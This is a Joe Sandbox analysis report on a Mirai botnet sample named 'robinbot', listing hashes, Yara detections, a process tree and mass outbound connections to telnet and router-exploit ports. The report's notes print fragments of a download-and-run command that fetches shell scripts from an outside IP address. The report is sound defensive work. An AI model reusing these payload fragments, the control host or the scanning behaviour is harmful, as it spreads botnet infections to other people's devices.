Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
robinbot

Overview

General Information

Sample Name:robinbot
Analysis ID:756090
MD5:500009d8f68330a8f82b59884a9afe47
SHA1:575f5e6894b1a2f7a728435487666acdb9758f83
SHA256:a46770913fba87921b56d789396e07cdfd68a846b2e80a77aa07e1c62f9304d6
Infos:

Detection

Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample deletes itself
Machine Learning detection for sample
Yara signature match
Sample contains strings that are potentially command strings
Uses the "uname" system call to query kernel version information (possible evasion)
Detected TCP or UDP traffic on non-standard ports
Sample and/or dropped files contains symbols with suspicious names
Sample listens on a socket
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Classification

Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:756090
Start date and time:2022-11-29 16:26:55 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 55s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:robinbot
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal96.troj.evad.lin@0/2@0/0
  • VT rate limit hit for: http://89.203.251.188/bin.sh;chmod
  • TCP Packets have been reduced to 100
  • VT rate limit hit for: http://89.203.251.188/bins.sh;chmod
  • VT rate limit hit for: http://89.203.251.188/bins.sh;sh
  • VT rate limit hit for: http://89.203.251.188/bins.sh;sh$
Command:/tmp/robinbot
PID:9446
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu1
  • robinbot (PID: 9446, Parent: 9378, MD5: unknown) Arguments: /tmp/robinbot
    • robinbot New Fork (PID: 9447, Parent: 9446)
      • robinbot New Fork (PID: 9448, Parent: 9447)
      • robinbot New Fork (PID: 9449, Parent: 9447)
      • robinbot New Fork (PID: 9450, Parent: 9447)
        • robinbot New Fork (PID: 9451, Parent: 9450)
  • upstart New Fork (PID: 9461, Parent: 3310)
  • sh (PID: 9461, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 9470, Parent: 9461)
    • date (PID: 9470, Parent: 9461, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 9472, Parent: 9461)
    • apport-checkreports (PID: 9472, Parent: 9461, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 9488, Parent: 3310)
  • sh (PID: 9488, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 9490, Parent: 9488)
    • date (PID: 9490, Parent: 9488, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 9499, Parent: 9488)
    • apport-gtk (PID: 9499, Parent: 9488, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 9515, Parent: 3310)
  • sh (PID: 9515, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 9517, Parent: 9515)
    • date (PID: 9517, Parent: 9515, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 9532, Parent: 9515)
    • apport-gtk (PID: 9532, Parent: 9515, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup
SourceRuleDescriptionAuthorStrings
robinbotSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
  • 0x16200:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x16270:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x162e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x16350:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x163c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
robinbotMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
  • 0x117db:$x2: /dev/misc/watchdog
  • 0x117cd:$x3: /dev/watchdog
  • 0x1605e:$s1: LCOGQGPTGP
  • 0x15df9:$s3: CFOKLKQVPCVMP
  • 0x15de1:$s4: QWRGPTKQMP
  • 0x15d6c:$s5: HWCLVGAJ
  • 0x15f25:$s6: NKQVGLKLE
robinbotJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    robinbotJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      robinbotJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        Click to see the 14 entries
        SourceRuleDescriptionAuthorStrings
        9449.1.0000000000400000.0000000000418000.r-x.sdmpSUSP_XORed_MozillaDetects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key.Florian Roth
        • 0x16200:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x16270:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x162e0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x16350:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x163c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        9449.1.0000000000400000.0000000000418000.r-x.sdmpMirai_Botnet_MalwareDetects Mirai Botnet MalwareFlorian Roth
        • 0x117db:$x2: /dev/misc/watchdog
        • 0x117cd:$x3: /dev/watchdog
        • 0x1605e:$s1: LCOGQGPTGP
        • 0x15df9:$s3: CFOKLKQVPCVMP
        • 0x15de1:$s4: QWRGPTKQMP
        • 0x15d6c:$s5: HWCLVGAJ
        • 0x15f25:$s6: NKQVGLKLE
        9449.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          9449.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
            9449.1.0000000000400000.0000000000418000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
              Click to see the 79 entries
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: robinbotReversingLabs: Detection: 61%
              Source: robinbotVirustotal: Detection: 65%Perma Link
              Source: robinbotJoe Sandbox ML: detected
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 163.151.162.85:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 104.142.173.149:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 209.184.177.135:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 137.243.81.5:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 2.206.168.216:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 19.135.140.179:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 197.239.84.85:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 200.92.245.153:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 116.67.119.148:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 141.120.197.91:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 65.154.218.40:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 124.212.254.113:2323
              Source: global trafficTCP traffic: 192.168.2.20:40644 -> 187.127.3.105:8080
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 163.136.220.64:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 160.154.217.169:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 42.100.191.234:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 44.137.192.245:2323
              Source: global trafficTCP traffic: 192.168.2.20:39792 -> 189.236.169.194:8080
              Source: global trafficTCP traffic: 192.168.2.20:43256 -> 89.203.251.188:7267
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 147.79.64.93:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 135.149.49.5:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 219.178.111.66:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 75.55.208.35:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 160.142.234.100:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 173.9.184.220:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 187.224.94.159:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 105.123.130.198:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 149.222.104.130:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 200.214.123.249:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 54.6.154.146:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 55.85.248.107:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 65.170.196.42:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 107.89.146.145:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 143.144.130.65:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 115.100.246.114:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 204.213.205.118:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 44.70.201.148:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 114.154.146.252:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 84.126.30.181:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 72.96.228.219:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 5.249.17.203:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 29.105.195.127:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 50.40.194.3:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 162.78.6.107:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 220.202.211.41:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 91.36.64.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 139.131.111.14:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 23.22.98.112:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 109.11.173.177:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 110.140.165.131:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 223.6.247.130:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 107.233.118.154:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 94.26.22.117:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 44.179.158.49:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 119.11.139.79:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 105.66.194.214:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 75.26.181.151:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 213.4.250.93:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 1.136.86.171:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 79.83.63.161:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 67.151.50.197:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 169.173.222.182:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 75.6.93.112:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 48.236.86.172:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 15.192.178.237:2323
              Source: global trafficTCP traffic: 192.168.2.20:59856 -> 187.119.191.232:8080
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 95.52.106.171:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 2.149.147.150:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 33.148.92.70:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 171.173.99.26:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 108.208.102.205:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 130.216.49.6:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 96.158.69.6:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 93.51.139.184:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 96.83.234.242:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 216.46.203.199:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 119.249.93.179:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 158.212.150.123:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 82.232.99.98:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 165.251.205.13:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 62.112.225.121:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 158.204.80.148:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 2.214.55.57:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 106.189.126.165:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 115.4.227.195:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 71.181.130.227:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 91.109.14.17:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 160.30.6.161:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 44.117.53.207:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 79.95.201.126:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 115.193.18.50:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 139.64.21.84:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 207.100.22.63:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 9.25.164.58:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 88.170.167.42:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 177.223.99.112:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 31.233.64.156:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 153.116.66.16:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 17.174.21.93:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 79.117.93.26:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 161.84.160.216:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 64.10.38.215:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 128.75.30.64:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 16.66.216.208:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 222.134.132.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 80.177.116.178:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 89.60.180.230:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 186.130.167.134:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 114.91.131.16:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 87.141.30.72:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 32.227.145.174:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 108.73.29.204:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 106.155.152.197:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 124.65.63.81:2323
              Source: global trafficTCP traffic: 192.168.2.20:41358 -> 187.245.213.139:8080
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 11.218.149.26:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 110.210.0.7:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 157.169.77.132:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 5.135.137.173:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 132.161.54.74:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 31.220.244.241:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 187.192.10.153:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 3.231.89.198:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 115.97.197.218:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 113.38.186.195:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 89.63.29.167:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 43.38.71.86:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 71.118.231.208:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 183.250.197.133:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 181.180.110.135:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 71.148.112.115:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 70.235.235.75:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 32.52.35.23:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 221.142.142.57:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 180.211.170.16:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 85.231.39.47:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 183.131.151.92:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 195.34.132.90:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 50.5.252.251:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 212.233.55.201:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 75.97.244.246:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 52.180.129.119:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 67.141.38.213:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 177.133.155.80:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 116.186.50.145:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 116.212.180.80:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 62.196.12.160:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 136.8.93.180:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 164.57.193.76:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 46.167.217.53:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 98.121.27.54:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 157.95.21.205:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 43.160.254.106:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 72.228.102.105:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 94.17.137.86:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 149.35.160.212:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 137.106.150.131:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 22.136.128.97:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 189.249.205.243:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 71.211.243.4:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 121.110.73.27:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 33.132.113.87:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 167.158.157.57:2323
              Source: global trafficTCP traffic: 192.168.2.20:36688 -> 189.38.139.35:8080
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 200.151.49.59:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 142.121.197.7:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 77.66.22.4:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 199.87.129.117:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 8.129.133.147:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 95.195.226.70:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 13.42.219.133:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 21.117.53.252:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 154.151.66.94:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 122.66.123.169:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 121.39.224.137:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 44.111.126.19:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 102.229.168.3:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 153.214.121.126:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 143.98.42.186:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 139.191.181.20:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 54.31.132.214:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 163.37.245.24:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 113.245.14.6:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 168.97.206.194:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 109.27.179.30:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 189.116.191.64:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 179.95.137.156:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 95.38.160.52:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 108.228.239.195:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 149.82.51.33:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 157.80.239.181:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 167.181.60.65:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 52.65.175.98:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 51.245.110.17:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 39.246.123.239:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 2.210.145.46:2323
              Source: global trafficTCP traffic: 192.168.2.20:41170 -> 187.46.99.177:8080
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 219.122.105.221:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 108.240.60.197:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 27.135.198.213:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 220.148.44.31:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 149.171.118.135:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 144.252.121.112:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 213.226.154.87:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 166.247.194.109:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 16.133.163.123:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 176.98.151.86:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 123.172.10.234:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 137.160.241.156:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 118.191.83.238:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 44.215.225.207:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 176.189.183.229:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 140.164.70.61:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 25.158.61.237:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 93.120.73.32:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 121.151.162.233:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 154.230.112.114:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 24.178.223.210:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 188.127.51.54:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 68.42.44.95:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 137.98.13.32:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 89.232.237.134:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 100.16.103.72:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 214.199.75.211:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 163.4.151.124:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 165.216.141.58:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 166.231.158.138:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 134.162.203.241:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 97.217.0.76:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 173.78.32.4:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 139.130.20.252:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 16.76.40.204:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 138.31.232.216:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 159.232.28.131:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 22.253.251.152:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 44.144.16.201:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 179.137.100.52:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 77.110.228.69:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 167.241.180.160:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 133.162.195.74:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 39.169.161.170:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 211.69.184.58:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 81.164.55.227:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 202.188.206.186:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 197.47.245.230:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 182.19.32.242:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 94.98.36.29:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 12.28.211.180:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 157.77.58.92:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 205.218.25.88:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 99.252.11.90:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 158.136.212.224:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 176.173.120.82:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 86.82.172.87:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 101.251.200.37:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 38.12.182.131:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 206.174.59.37:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 88.85.4.247:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 40.160.100.143:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 132.90.101.151:2323
              Source: global trafficTCP traffic: 192.168.2.20:15661 -> 28.31.41.64:2323
              Source: global trafficTCP traffic: 192.168.2.20:40122 -> 121.227.36.161:52869
              Source: global trafficTCP traffic: 192.168.2.20:37258 -> 216.148.34.2:52869
              Source: global trafficTCP traffic: 192.168.2.20:58652 -> 165.138.116.213:52869
              Source: global trafficTCP traffic: 192.168.2.20:50706 -> 42.153.99.93:52869
              Source: global trafficTCP traffic: 192.168.2.20:34530 -> 171.2.190.24:52869
              Source: global trafficTCP traffic: 192.168.2.20:37156 -> 136.69.233.238:52869
              Source: global trafficTCP traffic: 192.168.2.20:55608 -> 67.151.29.209:52869
              Source: global trafficTCP traffic: 192.168.2.20:51396 -> 183.78.182.208:52869
              Source: global trafficTCP traffic: 192.168.2.20:33894 -> 183.88.38.240:8080
              Source: global trafficTCP traffic: 192.168.2.20:49558 -> 112.191.186.107:8080
              Source: global trafficTCP traffic: 192.168.2.20:51920 -> 148.135.41.142:8080
              Source: global trafficTCP traffic: 192.168.2.20:46692 -> 88.109.40.245:8080
              Source: global trafficTCP traffic: 192.168.2.20:34742 -> 96.65.200.17:8080
              Source: global trafficTCP traffic: 192.168.2.20:58436 -> 33.167.163.147:8080
              Source: global trafficTCP traffic: 192.168.2.20:42454 -> 178.198.5.222:8080
              Source: global trafficTCP traffic: 192.168.2.20:47414 -> 104.170.207.190:8080
              Source: global trafficTCP traffic: 192.168.2.20:59518 -> 78.10.169.100:8080
              Source: global trafficTCP traffic: 192.168.2.20:41696 -> 150.155.178.72:37215
              Source: global trafficTCP traffic: 192.168.2.20:37166 -> 81.228.113.97:37215
              Source: global trafficTCP traffic: 192.168.2.20:36476 -> 161.88.30.216:37215
              Source: global trafficTCP traffic: 192.168.2.20:37112 -> 168.64.202.149:37215
